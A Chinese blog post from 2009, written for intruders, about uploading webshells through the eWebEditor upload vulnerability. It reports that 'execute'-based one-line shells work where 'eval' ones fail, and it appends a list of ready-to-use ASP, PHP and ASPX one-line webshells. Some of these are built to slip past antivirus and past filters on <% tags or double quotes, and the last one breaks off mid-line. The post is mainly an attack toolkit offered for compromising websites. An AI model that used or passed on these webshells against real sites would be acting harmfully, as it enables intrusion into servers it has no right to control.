应对eWebEditor漏洞上传文件500错误的方法


相信大家对eWebEditor并不陌生

大家在搞站的可否发现有的uploadfiles目录里面传上去的大马或小马是500错误

入侵了这么久,发现在此情况下,上传一句话,可以连接!

eval的一句话有时候会失败

execute的一句话基本上都是成功的!

By:van

附:(多种写一句话的方法)

ASP一句话
1.<%eval request("YouPass")%>
2. <%executerequest("YouPass")%>
3. <%execute(request("YouPass"))%>

免杀大部分网站的一句话
4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>

免杀部分网站过略<%,%>的一句话
5.<script language=VBScript runat=server>execute request("YouPass")</script%gt;

免杀部分网站过略双引号的一句话
6.<%eval request(YouPass(35))%>

php一句话
7.<?php eval($_POST[YouPass]);?>

aspx一句话
8.<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("

[本日志由 随然 于 2009-11-28 11:54 PM 编辑]
上一篇: eWebEditor文件上传漏洞的修补方法
下一篇: eWebEditor文件上传漏洞的利用
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: ASP 黑客
相关日志:
评论: 0 | 引用: 0 | 查看次数: 8766
发表评论
昵 称:
密 码: 游客发言不需要密码.
邮 箱: 邮件地址支持Gravatar头像,邮箱地址不会公开.
网 址: 输入网址便于回访.
内 容:
验证码:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1 字 | UBB代码 关闭 | [img]标签 关闭